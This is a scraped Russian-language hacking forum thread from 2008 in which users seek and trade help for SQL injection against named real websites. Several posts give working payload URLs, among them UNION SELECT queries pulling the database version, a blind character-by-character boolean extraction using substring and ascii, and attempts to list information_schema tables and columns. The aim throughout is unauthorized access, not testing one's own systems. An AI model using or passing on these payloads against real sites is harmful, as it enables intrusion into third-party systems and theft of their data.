Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    нашел sql inc не могу пробить
    помогите
    http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=999999
    уже все испробовал :(
     
    1 person likes this.
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    bag врать нехорошо. читай маны и пробуй, там все самое элементарное.
    сам не попробуешь - подсказок не будет)
     
  3. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    ок,пробовал
    http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=1+group+by+1/* загрузилась
    пробую
    http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=1+union+select+1/*
    The used SELECT statements have a different number of columns
     
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    только эти два запроса? чтоже ты хотел ими сделать?
     
  5. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    да не только ими, читаю мануалы,статьи,пока ничего не выходит:)
     
  6. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    ну кто-нибудь может мне помочь? уже замучился :/
     
    1 person likes this.
  7. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    xcedz, спасибо канечно, но это я давно нашел, я хотел бы разобраться с
    http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=
     
  8. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    народ может кто посмотрит? забадался
     
  9. constanta

    constanta New Member

    Joined:
    19 Sep 2007
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    не хочется флудить, но меня тоже интересует решение этой задачи :
    Бы ло бы интересно увидеть какой тут должен быть запрос.
     
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=2+and+ascii(lower(substring((select+version()),1,1)))=0x35/*

    т.е. посимвольный брут. ошибка после селекта может быть там во многих случаях. к примеру там идет два и более перекрестных запроса на данную переменную, имеющих различные кол-ва колонок
     
    #1290 darky, 21 Mar 2008
    Last edited: 21 Mar 2008
    2 people like this.
  11. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    спасибо,есть над чем подумать:)
     
  12. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    sql-inj или нет
    http://www.sceleton.dom.raid.ru/index.php?act='
    http://link.raid.ru/browse.php?cat=-5'
    может быть отключён вывод ошибок но немогу подобрать кол-во таблиц
     
    #1292 ReVOLVeR, 21 Mar 2008
    Last edited: 21 Mar 2008
  13. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    может кто посмотрит?
     
  14. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
     
    _________________________
    #1294 +toxa+, 21 Mar 2008
    Last edited: 21 Mar 2008
    1 person likes this.
  15. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    тоха респект тебе)
     
  16. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*

    Forbidden
    You don't have permission to access /browse.php on this server.

    Хотя user(),database(),version() выполняются
     
    #1296 ReVOLVeR, 21 Mar 2008
    Last edited: 21 Mar 2008
  17. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    тьфу блин тупею...
     
  18. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Там мукул четвертый, information_schema там нет.
    PHP:
    http://link.raid.ru/browse.php?cat=-1+union+select+table_name+from+information_schema.tables/*
     
    #1298 .Begemot., 21 Mar 2008
    Last edited: 21 Mar 2008
  19. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=2+and+ascii(lower(substring((select+version( )),1,1)))=0x35/*
    можно ли этим способом вывести строчку или какой нить символ чтобы можно было увидеть инъекцию?
     
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Там мукул четвертый, скорее всего information_schema там нет.

    гыгыгыг, ога, information_schema это такая непостоянная фигня, где заочет там и появляется, обычно она в пятой версии но иногда и в 4, хотя скорее всего там нет
    пиздец!
     
    4 people like this.
Thread Status:
Not open for further replies.